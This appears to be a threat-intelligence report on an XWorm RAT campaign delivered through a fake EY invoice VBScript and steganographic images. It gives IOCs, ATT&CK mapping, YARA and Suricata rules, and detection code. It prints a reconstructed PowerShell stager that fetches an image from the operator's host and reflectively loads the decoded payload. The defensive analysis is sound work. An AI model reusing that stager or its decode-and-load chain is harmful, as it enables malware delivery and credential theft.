Severity: High | Category: Phishing

XWorm 7.4 Delivered via Fake EY Invoice: Five-Layer Steganography Chain, Portuguese-Speaking Operator, and Bulletproof Hosting in the Seychelles

Published: March 12, 2026
Tags: phishing, xworm, credential-theft, c2, exploit, apt, spearphishing

TL;DR: A VBScript dropper masquerading as an Ernst & Young invoice (EY Invoice_P1K2317563.vbs) delivers XWorm 7.4 RAT through a five-layer obfuscation chain: Unicode-padded VBS to hex-encoded PowerShell to steganographic PNG downloads to .NET reflective loading to process injection into RegAsm.exe. The operator -- likely Portuguese-speaking based on steganography markers ("INICIO" / "FIM") -- uses a cluster of co-hosted image upload domains for payload delivery and parks their C2 on Omegatech LTD bulletproof hosting in the Seychelles. The C2 domain evaultbuzzfix[.]com has been active since September 2025, and the secondary steganographic payload image was still live at time of analysis.


The Lure: Big Four Brand Impersonation

The attack begins with what appears to be a routine accounts payable attachment: EY Invoice_P1K2317563.vbs. The invoice number format is realistic enough to pass a quick glance from a finance department staffer accustomed to processing Big Four consulting invoices. The .vbs extension is the only immediate red flag -- and in environments where script execution is not blocked at the email gateway, that single oversight is all the operator needs.

The file itself is 1.1MB -- abnormally large for a VBScript. Of its 16,163 lines, only 33 are functional. The remaining 16,130 lines are junk padding designed to frustrate analyst review and bypass file-size heuristics in sandbox environments.

Property | Value
Filename | EY Invoice_P1K2317563.vbs
SHA-256 | a0134fc7c275aa80e90f2fec7bb474bb5c83ab195070ba98f15756f8de0b666f
SHA-1 | e28ffe319accfc6c1505ca77d2e711ee262941b9
MD5 | 834854f74060926baf5d2c46d14030a8
Size | 1,160,434 bytes
Lines | 16,163 total (33 functional, 16,130 junk)
Obfuscation | Two distinct Unicode separator strings inserted between characters

The Five-Layer Kill Chain

[EY Invoice Email]
       |
       v
[EY Invoice_P1K2317563.vbs]  (1.1MB, Unicode obfuscated)
       |
       v
[WMI Process Create] --> powershell.exe -NoProfile -WindowStyle Hidden
       |
       v
[Download PNG 1: pngup.com/rv2N/optimized_MSI.png]
       |  (steganographic image -- .NET Fiber loader)
       v
[Extract between "IN-" and "-in1" markers]
[Replace # with A, Reverse, Base64 decode]
       |
       v
[Fiber.Program .NET loader via AppDomain.Load()]
       |
       v
[Download PNG 2: djfancy.ct.ws/img_184040.png]
       |  (2.3MB steganographic JPEG)
       v
[Extract XWorm PE between "INICIO==" and "FIM" markers]
[Replace # with A, Reverse, Base64 decode]
       |
       v
[XWorm 7.4 injected into RegAsm.exe]
       |
       v
[C2 beacon: evaultbuzzfix.com:6000 (158.94.210.122)]

Layer 0: VBScript Dropper

The VBS file uses a clever obfuscation technique: two distinct Unicode separator strings are injected between every meaningful character in the code. After stripping these separators, the functional payload emerges -- a WMI-based process launcher that invokes PowerShell through winmgmts:root\cimv2 -> Win32_Process.Create. This is T1047 (WMI) chained with T1059.005 (VBScript) -- the WMI execution breaks the direct parent-child process relationship between wscript.exe and powershell.exe, complicating EDR detection rules that look for direct VBS-to-PowerShell spawning.

Layer 1: PowerShell Stager

The decoded PowerShell (1,358 bytes) performs a single critical function: downloading a steganographic PNG from the operator's image upload infrastructure and extracting a .NET assembly from it.

# Reconstructed logic (deobfuscated)
# Fetch the steganographic carrier image from the operator's upload host
$img = (New-Object Net.WebClient).DownloadData('https://pngup[.]com/rv2N/optimized_MSI.png')
# Treat the raw bytes as text so the markers can be located with string searches
$text = [Text.Encoding]::UTF8.GetString($img)
# Carve everything between the "IN-" and "-in1" markers
$start = $text.IndexOf('IN-') + 3
$end = $text.IndexOf('-in1')
$payload = $text.Substring($start, $end - $start)
# Decode chain: restore the 'A' characters, reverse the string, then Base64-decode
$payload = $payload.Replace('#','A')
$reversed = -join ($payload[-1..-($payload.Length)])
$bytes = [Convert]::FromBase64String($reversed)
# Load the decoded .NET assembly in memory and call Fiber.Program.Main
$assembly = [AppDomain]::CurrentDomain.Load($bytes)
$assembly.GetType('Fiber.Program').GetMethod('Main').Invoke($null, $null)

The extraction logic is identical across both steganographic layers: find payload between markers, replace # with A, reverse the string, Base64-decode. This signature pattern -- the character substitution followed by reversal before Base64 -- is a strong behavioral indicator for this operator's toolkit.
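The marker-carve-and-decode chain shared by both layers (IN-/-in1 and INICIO==/FIM), as an added analyst-side extractor written for this write-up rather than taken from the report or the malware; the triage fields and the sample carrier are constructed here, and the carrier check also records whether the markers sit after the last JPEG FFD9 marker as the report describes.

```python
import base64

# Marker pairs the report attributes to the two steganographic layers.
MARKER_PAIRS = [
    (b"IN-", b"-in1"),      # layer 1: carries the .NET Fiber loader
    (b"INICIO==", b"FIM"),  # layer 2: carries the XWorm PE (Portuguese markers)
]
JPEG_EOI = b"\xff\xd9"


def decode_stego_blob(blob: bytes) -> bytes:
    """The operator's decode chain: '#' -> 'A', reverse, then Base64-decode."""
    return base64.b64decode(blob.replace(b"#", b"A")[::-1], validate=True)


def carve_payload(image: bytes, start_marker: bytes, end_marker: bytes):
    """Decode the blob between the markers; None if they are absent or the blob
    is not valid Base64. The end marker is searched from the end of the file
    because 'F', 'I' and 'M' are legal Base64 characters and may occur inside
    the blob itself (the markers are appended, so the last occurrence is it)."""
    s = image.find(start_marker)
    if s == -1:
        return None
    s += len(start_marker)
    e = image.rfind(end_marker)
    if e <= s:
        return None
    try:
        return decode_stego_blob(image[s:e])
    except ValueError:  # includes binascii.Error raised by validate=True
        return None


def analyze_carrier(image: bytes) -> dict:
    """Triage an image: which marker pair is present, whether it sits after the
    last JPEG EOI (FFD9) marker, and whether the decoded payload is a PE."""
    result = {"layer": None, "after_jpeg_eoi": False, "is_pe": False, "payload": None}
    last_eoi = image.rfind(JPEG_EOI)
    for start_marker, end_marker in MARKER_PAIRS:
        pos = image.find(start_marker)
        payload = carve_payload(image, start_marker, end_marker) if pos != -1 else None
        if payload is None:
            continue
        result.update(layer=end_marker.decode(), payload=payload,
                      after_jpeg_eoi=(last_eoi != -1 and pos > last_eoi),
                      is_pe=payload[:2] == b"MZ")
        break
    return result


# Constructed fixture (not a real sample): a stub "PE" appended to a minimal
# JPEG-like carrier with the layer-2 markers and the same encoding chain.
FAKE_PE = b"MZ" + b"\x90" * 61
_blob = base64.b64encode(FAKE_PE)[::-1].replace(b"A", b"#")
SAMPLE_CARRIER = b"\xff\xd8\xff\xe0 cover image bytes \xff\xd9INICIO==" + _blob + b"FIM"
```

Run `analyze_carrier(open(path, "rb").read())` on a suspect image; a result with `is_pe` set and `after_jpeg_eoi` true matches the carrier layout described in the report.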

Layer 2: Steganographic Payload Delivery

This is where the campaign gets interesting. The operator uses image steganography twice: first to deliver a .NET loader, then to deliver the final XWorm payload. Both payloads are appended after the JPEG end-of-file marker (FFD9), meaning standard image viewers render the files normally while the malicious content rides silently past content inspection.

The second steganographic image is particularly notable:

Property | Value
URL | hxxps://djfancy[.]ct[.]ws/img_184040.png
SHA-256 | 6be9f7e34431ab2e44b7cfe513e966ee924e1b0e57da87a65fec23ca05b98ff6
Size | 2,279,412 bytes
Actual Format | JPEG (despite .png extension)
Exif Data | Adobe Photoshop CC 2019 (Windows), 2022-05-05
Photoshop Layer Text | "ONE BOARD TO RULE THEM ALL"
Stego Payload | 210,103 bytes appended after JPEG FFD9 marker
Markers | INICIO== (start) / FIM (end) -- Portuguese

The Photoshop metadata indicates the cover image was created in 2022 and later repurposed as a steganographic carrier. The Photoshop layer text "ONE BOARD TO RULE THEM ALL" is likely residual from the original image's context and not operationally significant -- but it is a fingerprint that could help identify other images from the same operator.

This image was still live and serving the XWorm payload at time of analysis.

Layer 3: .NET Reflective Loader (Fiber.Program)

The first steganographic extraction yields a .NET assembly with the namespace Fiber and entry point Fiber.Program.Main(). This loader's sole purpose is to download the second steganographic image, extract the final payload using the Portuguese-language markers, and inject it into a legitimate Windows binary.

Layer 4: XWorm 7.4 RAT

The final payload is XWorm 7.4, injected into RegAsm.exe -- a legitimate .NET assembly registration utility (T1218.009, LOLBin abuse). Running inside RegAsm provides process-level legitimacy and may bypass application whitelisting policies that trust Microsoft-signed binaries.

Property | Value
SHA-256 | bddfbcec70a756033af747d918fd300e0fb0c2bf19c29e993c5605ff1ac82aa1
MD5 | 89daab12baadd9a6d0fddbc897324a76
Size | 157,569 bytes
Family | XWorm 7.4
Variant String | Harry_XWormClient 7.4 (With statup)
Assembly GUID | 5e10c103-9b22-4589-96e7-ec225f280
Language | VB.NET (obfuscated)
C2 | evaultbuzzfix[.]com:6000
License | KeyAuth commercial builder

The variant string "Harry_XWormClient" suggests the operator handle "Harry" -- likely a pseudonym used within XWorm's commercial licensing ecosystem via KeyAuth. The misspelling "statup" (instead of "startup") is present in the binary itself and serves as a reliable detection string.

XWorm 7.4 capabilities include: remote shell, keylogging (T1056.001), screen capture (T1113), webcam capture (T1125), browser data theft (T1555.003), Outlook exploitation (T1114.001), USB spreading (T1091), AES-encrypted C2 (T1573), DDoS, and arbitrary file operations.

Infrastructure: Stego Delivery Cluster and Bulletproof C2

The PNG Upload Cluster

Three image upload domains share a single OVH server and a single Let's Encrypt certificate -- a strong indicator of common ownership:

pngup[.]com
uppng[.]com
pngupload[.]com

All three resolve to 149.56.126.37 (OVH, AS16276). The shared Let's Encrypt certificate (serial 0533c5e49f1967dc1f994c177b416a2bebdc) covers all three domains plus their www. variants. Certificate Transparency logs show 17+ certificates issued to this cluster since April 2025, indicating sustained operational use.

At time of analysis, the primary stego delivery URL (hxxps://pngup[.]com/rv2N/optimized_MSI.png) returned HTTP 502 -- the payload had been pulled or the backend crashed. But the secondary delivery at djfancy[.]ct[.]ws remained fully live.

The Secondary Delivery: Free Hosting

The djfancy[.]ct[.]ws domain is hosted on iFastNet's free hosting platform (Byet.org) at 185.27.134.153. Free hosting services are a recurring pattern in commodity malware delivery -- they require no payment information, offer minimal abuse response, and can be spun up in minutes. Port 27015 open on this server suggests it may also serve as a gaming server, consistent with a shared hosting environment.

The C2: Bulletproof Hosting in the Seychelles

The XWorm C2 at 158.94.210.122 is the most significant infrastructure indicator. It sits within a /24 allocation owned by Omegatech LTD, a known bulletproof hosting provider registered in the Seychelles.

Omegatech LTD (Seychelles)
  abuse: abuse@omegatech.sc
  MNT:   omegatechsc-mnt
  Upstream LIR: lir-tr-mgn-1-MNT (Turkish)
  ASN:   AS214943 (RAILNET)
    |
    +-- 158.94.210.0/24 (OMEGATECH allocation)
          |
          +-- 158.94.210.122 (XWorm C2)
                Ports: 135/RPC, 445/SMB, 3389/RDP, 5985/WinRM, 6000/XWorm
                Status: CVE-2020-0796 (SMBGhost) VULNERABLE

The open port profile tells a story: this is a Windows server with RDP, WinRM, SMB, and RPC exposed -- an administration profile consistent with a manually managed C2 server rather than an automated deployment. The SMBGhost vulnerability (CVE-2020-0796) indicates the server is running an unpatched build of Windows 10 or Server, which is ironic but typical for bulletproof infrastructure where the operator prioritizes anonymity over their own server security.

The Turkish upstream LIR (Local Internet Registry) is notable -- Omegatech LTD operates from the Seychelles but routes through Turkish infrastructure, a common pattern for BPH providers seeking jurisdictional arbitrage.

Domain Timeline

The C2 domain evaultbuzzfix[.]com has a longer history than the current campaign:

Date | Event
2024-01-19 | First certificate (Sectigo) for form.evaultbuzzfix.com
2024-04-25 | pngup[.]com registered (DropCatch/NameBright)
2025-04-06 | evaultbuzzfix[.]com re-registered via NameCheap
2025-08-04 | First Let's Encrypt cert for pngup cluster
2025-09-08 | evaultbuzzfix[.]com first reported as XWorm C2
2025-09-19 | Omegatech IP allocation created
2026-01-28 | 158.94.210.122:6000 reported as XWorm C2
2026-03-09 | EY Invoice VBS dropper first seen

The Sectigo certificate for form.evaultbuzzfix.com in January 2024 predates the malware use by over a year, suggesting the domain was either acquired from a previous owner or repurposed from an earlier project. The April 2025 re-registration via NameCheap and simultaneous migration to Cloudflare marks the beginning of the current malicious operation. A wildcard certificate (*.evaultbuzzfix.com) in CT logs indicates the operator may be running additional subdomains beyond what has been observed.

This C2 has been publicly reported as an XWorm server since September 2025 -- six months of continuous operation with no takedown.

Threat Actor Profile

Attribution Indicators

Indicator | Assessment
Language | Portuguese (INICIO/FIM steganography markers)
Region | Likely Brazil or Portugal
Handle | "Harry" (XWorm variant string)
Motivation | Financial (credential theft, RAT access)
Sophistication | MEDIUM-HIGH
Tooling | Commercial XWorm builder via KeyAuth license
Confidence | MEDIUM

The Portuguese-language steganography markers are the strongest linguistic indicator. "INICIO" (beginning) and "FIM" (end) are standard Portuguese, not Spanish (which would use "INICIO" and "FIN"). This narrows the operator's likely origin to Brazil or Portugal. The use of a commercial XWorm builder through KeyAuth suggests the operator is a customer of the XWorm ecosystem rather than its developer -- a buyer leveraging off-the-shelf RAT capabilities with custom delivery infrastructure.

MITRE ATT&CK Mapping

Tactic | Technique | ID | Implementation
Initial Access | Phishing: Spearphishing Attachment | T1566.001 | EY Invoice VBS email attachment
Execution | Command and Scripting Interpreter: VBScript | T1059.005 | Unicode-obfuscated VBS dropper
Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | Hidden PowerShell stager (1,358 bytes)
Execution | Windows Management Instrumentation | T1047 | WMI process creation breaks parent-child chain
Persistence | Boot or Logon Autostart: Startup Folder | T1547.001 | Xwin.lnk in Startup folder
Defense Evasion | Obfuscated Files or Information | T1027 | Unicode separator padding (16,130 junk lines)
Defense Evasion | Obfuscated Files or Information: Steganography | T1027.003 | Dual steganographic JPEG payload delivery
Defense Evasion | Deobfuscate/Decode Files or Information | T1140 | Multi-layer decode: hex, base64, string reversal
Defense Evasion | Masquerading | T1036 | EY brand impersonation
Defense Evasion | Signed Binary Proxy Execution: RegAsm | T1218.009 | XWorm injected into RegAsm.exe LOLBin
Defense Evasion | Process Injection | T1055 | Payload injection into RegAsm.exe
Credential Access | Credentials from Password Stores: Web Browsers | T1555.003 | Browser credential and cookie theft
Credential Access | Input Capture: Keylogging | T1056.001 | XWorm keylogger module
Collection | Screen Capture | T1113 | XWorm screen capture capability
Collection | Video Capture | T1125 | XWorm webcam capture
Collection | Email Collection: Local Email Collection | T1114.001 | Outlook data exploitation
Lateral Movement | Replication Through Removable Media | T1091 | USB spreading capability
Command and Control | Non-Standard Port | T1571 | C2 on port 6000
Command and Control | Encrypted Channel | T1573 | AES-encrypted C2 communications

Indicators of Compromise

Network Indicators

# C2
evaultbuzzfix[.]com
158.94.210.122:6000

# Stego Delivery -- Primary Cluster
pngup[.]com
uppng[.]com
pngupload[.]com
149.56.126.37

# Stego Delivery -- Secondary
djfancy[.]ct[.]ws
185.27.134.153

# Payload URLs (defanged)
hxxps://pngup[.]com/rv2N/optimized_MSI[.]png
hxxps://djfancy[.]ct[.]ws/img_184040[.]png

# License Server
keyauth[.]win

File Indicators

File | SHA-256
VBS Dropper | a0134fc7c275aa80e90f2fec7bb474bb5c83ab195070ba98f15756f8de0b666f
Stego JPEG | 6be9f7e34431ab2e44b7cfe513e966ee924e1b0e57da87a65fec23ca05b98ff6
XWorm 7.4 PE | bddfbcec70a756033af747d918fd300e0fb0c2bf19c29e993c5605ff1ac82aa1

Host-Based Indicators

# Persistence
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Xwin.lnk

# Drop path
C:\Users\Public\Downloads\

# Process chain
wscript.exe -> [WMI] -> powershell.exe -> RegAsm.exe

# Strings in memory
Harry_XWormClient 7.4 (With statup)
5e10c103-9b22-4589-96e7-ec225f280
INICIO==
FIM

Detection Opportunities

YARA Rules

rule XWorm_EY_Invoice_VBS_Dropper {
    meta:
        description = "Detects EY Invoice VBS dropper with Unicode separator obfuscation"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:WHITE"
        severity = "HIGH"
        reference = "https://intel.breakglass.tech"
    strings:
        $vbs_wmi = "winmgmts" ascii wide nocase
        $vbs_process = "Win32_Process" ascii wide nocase
        $vbs_create = ".Create" ascii wide nocase
        $ps_hidden = "-WindowStyle Hidden" ascii wide nocase
        $ps_noprofile = "-NoProfile" ascii wide nocase
    condition:
        filesize > 1000000 and
        all of them
}

rule XWorm_Stego_Portuguese_Markers {
    meta:
        description = "Detects steganographic payloads with Portuguese INICIO/FIM markers"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:WHITE"
        severity = "HIGH"
    strings:
        $inicio = "INICIO==" ascii
        $fim = "FIM" ascii
        $jpeg_end = { FF D9 }
    condition:
        $jpeg_end and
        $inicio and $fim and
        @inicio > @jpeg_end
}

rule XWorm_74_Harry_Variant {
    meta:
        description = "Detects XWorm 7.4 Harry variant by unique strings"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:WHITE"
        severity = "CRITICAL"
    strings:
        $variant = "Harry_XWormClient" ascii wide
        $version = "7.4" ascii wide
        $typo = "statup" ascii wide
        $guid = "5e10c103-9b22-4589-96e7-ec225f280" ascii wide
        $mutex = "Xwin" ascii wide
    condition:
        uint16(0) == 0x5A4D and
        2 of them
}

Suricata/Snort Rules

# XWorm C2 beacon on non-standard port
alert tcp $HOME_NET any -> 158.94.210.122 6000 \
  (msg:"XWORM C2 Beacon to evaultbuzzfix BPH"; \
  flow:established,to_server; sid:2026030901; rev:1;)

# DNS lookup for XWorm C2 domain
alert dns $HOME_NET any -> any 53 \
  (msg:"XWORM C2 DNS Lookup evaultbuzzfix.com"; \
  dns.query; content:"evaultbuzzfix.com"; nocase; \
  sid:2026030902; rev:1;)

# Steganographic payload download from pngup cluster
alert http $HOME_NET any -> 149.56.126.37 any \
  (msg:"XWORM Stego Delivery from pngup Cluster"; \
  http.host; content:"pngup"; \
  sid:2026030903; rev:1;)

# Steganographic payload download from djfancy free hosting
alert http $HOME_NET any -> any any \
  (msg:"XWORM Stego Delivery from djfancy Free Host"; \
  http.host; content:"djfancy.ct.ws"; \
  sid:2026030904; rev:1;)

# WMI-spawned PowerShell with hidden window (behavioral; only fires if the command line crosses the wire in clear text)
alert ip any any -> any any \
  (msg:"SUSPICIOUS WMI to Hidden PowerShell Execution"; \
  content:"Win32_Process"; content:"powershell"; content:"-WindowStyle"; content:"Hidden"; \
  sid:2026030905; rev:1;)

EDR / SIEM Hunting Queries

RegAsm.exe spawned by PowerShell (process injection indicator):

process_name:"RegAsm.exe" AND parent_process_name:"powershell.exe"

Startup folder persistence (Xwin.lnk):

file_path:"*\\Start Menu\\Programs\\Startup\\Xwin.lnk"

Outbound connections to Omegatech /24 on any port:

dst_ip:"158.94.210.0/24" AND direction:"outbound"

VBS files over 1MB (junk-padded dropper pattern):

file_extension:"vbs" AND file_size:>1000000

PowerShell launched by the WMI provider host (the WMI hop makes WmiPrvSE.exe, not wscript.exe, PowerShell's parent):

process_name:"powershell.exe" AND parent_process_name:"wmiprvse.exe"
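The hunting queries above, as added detection logic that runs over constructed host telemetry (example code written for this page, not the report's own tooling; the Sysmon-style field names and the sample events are assumptions and should be mapped to your own schema):

```python
import ipaddress

C2_RANGE = ipaddress.ip_network("158.94.210.0/24")  # Omegatech allocation named in the report
STARTUP_LNK = "\\start menu\\programs\\startup\\xwin.lnk"


def exe(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


# name -> predicate over one event. Field names (type, image, parent, cmdline,
# path, dst_ip) are a constructed Sysmon-like schema; map them to your own.
RULES = {
    "wmi_spawned_hidden_powershell": lambda ev: (
        ev["type"] == "process" and exe(ev["image"]) == "powershell.exe"
        and exe(ev["parent"]) == "wmiprvse.exe"
        and "-windowstyle hidden" in ev["cmdline"].lower()),
    "regasm_spawned_by_powershell": lambda ev: (
        ev["type"] == "process" and exe(ev["image"]) == "regasm.exe"
        and exe(ev["parent"]) == "powershell.exe"),
    "xwin_startup_persistence": lambda ev: (
        ev["type"] == "file" and ev["path"].lower().endswith(STARTUP_LNK)),
    "outbound_to_omegatech_c2_range": lambda ev: (
        ev["type"] == "network" and ipaddress.ip_address(ev["dst_ip"]) in C2_RANGE),
}


def evaluate(events):
    """Return (rule_name, event_id) for every rule that fires on an event."""
    return [(name, ev["id"]) for ev in events for name, hit in RULES.items() if hit(ev)]


# Constructed sample telemetry (not real logs): the report's process chain and
# persistence/C2 artefacts, plus benign events 6 and 7 that must not fire.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    {"id": 1, "type": "process", "image": "C:\\Windows\\System32\\wscript.exe",
     "parent": "C:\\Windows\\explorer.exe", "cmdline": 'wscript.exe "EY Invoice_P1K2317563.vbs"'},
    {"id": 2, "type": "process", "image": PS, "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <omitted>"},
    {"id": 3, "type": "process", "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "parent": PS, "cmdline": "RegAsm.exe"},
    {"id": 4, "type": "file", "path": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows"
                                      "\\Start Menu\\Programs\\Startup\\Xwin.lnk"},
    {"id": 5, "type": "network", "dst_ip": "158.94.210.122", "dst_port": 6000},
    {"id": 6, "type": "process", "image": PS, "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"id": 7, "type": "network", "dst_ip": "192.0.2.10", "dst_port": 443},
]
```

Running `evaluate(EVENTS)` fires exactly once per malicious event (2, 3, 4 and 5) and stays silent on the benign interactive PowerShell launch and the unrelated outbound connection.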

Published by Breakglass Intelligence. Investigation conducted 2026-03-09. Secondary steganographic payload confirmed live at time of analysis. C2 infrastructure active for 6+ months with no takedown. Classification: TLP:WHITE
